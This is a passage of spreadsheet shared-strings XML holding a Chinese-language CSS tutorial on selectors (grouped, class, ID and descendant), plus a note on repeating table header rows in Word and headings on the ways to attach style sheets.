  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">C </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果需要对一个选择符指定多个属性时，我们使用分号将所有的属性和值分开</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例子</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:p {text-align: center; color: red} (</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段落居中排列</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>并且段落中的文字为红色</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">2. </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符组</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　你可以把相同属性和值的选择符组合起来书写，用逗号将选择符分开，这样可以减少样式重复定义</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>h1, h2, h3, h4, h5, h6 { color: green } (</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个组里包括所有的标题元素，每个标题元素的文字都为绿色</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">)  </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　用类选择符你能够把相同的元素分类定义不同的样式，定义类选择符时，在自定类的名称前面加一个点号。假如你想要两个不同的段落，一个段落向右对齐，一个段落居中，你可以先定义两个类</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">p.right {text-align: right} </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">p.center {text-align: center} </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　然后用不在不同的段落里，只要在</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记里加入你定义的</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>class</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;p class="right"&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个段落向右对齐的</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">&lt;/p&gt; </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&lt;p class="center"&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个段落是居中排列的</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">&lt;/p&gt;  </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　在</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>页面中</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数指定了某个单一元素，</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符是用来对这个单一元素定义单独的样式。</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符的应用和类选择符类似，只要把</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CLASS</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换成</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>即可。将上例中类用</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>替代</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>只能在一个页面中出现一次</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>而</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>class</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以多次运用</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">. </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个段落向右对齐</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　定义</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符要在</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称前加上一个</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“#”</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号。和类选择符相同，定义</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符的属性也有两种方法。下面这个例子，</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性将匹配所有</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>id="intro"</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">#intro </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">{ </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">font-size:110%; </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">font-weight:bold; </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">color:#0000ff; </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">background-color:transparent </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>} (</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>字体尺寸为默认尺寸的</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>110%;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗体</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓝色</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背景颜色透明</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">) </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　下面这个例子，</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性只匹配</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>id="intro"</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的段落元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">p#intro </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">} </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　注意</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:ID</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符局限性很大，只能单独定义某个元素的样式，一般只在特殊情况下使用。</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　可以单独对某种元素包含关系定义的样式表，元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>里包含元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这种方式只对在元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>里的元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定义，对单独的元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或元素</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无定义，例如</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">table a </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">font-size: 12px </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　在表格内的链接改变了样式，文字大小为</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>12</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>像素，而表格外的链接的文字仍为默认大小。</t>
    </r>
  </si>
  <si>
    <t>选中多行(，必须包含第一行，如果标题行只有一行，就是第一行，如果有两行，则选定两行）---表格---标题行重复；word2007:选中多行（不是整张表格）---布局（选项卡）---数据（栏）---重复标题行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.1 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链入外部样式表文件</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (Linking to a Style Sheet)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.2 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定义内部样式块对象</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (Embedding a Style Block)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（内嵌式）</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.3 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内联定义</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> (Inline Styles)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.4 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导入样式（</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Import Styles</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CSS</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Cascading Style Sheet</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，可译为</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>层叠样式表</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级联样式表</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）是一组格式设置规则，用于控制</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Web</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>页面的外观。通过使用</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CSS</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>样式设置页面的格式，可将页面的内容与表现形式分离。页面内容存放在</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文档中，而</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于定义表现形式的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CSS</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规则则存放在另一个文件中或</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
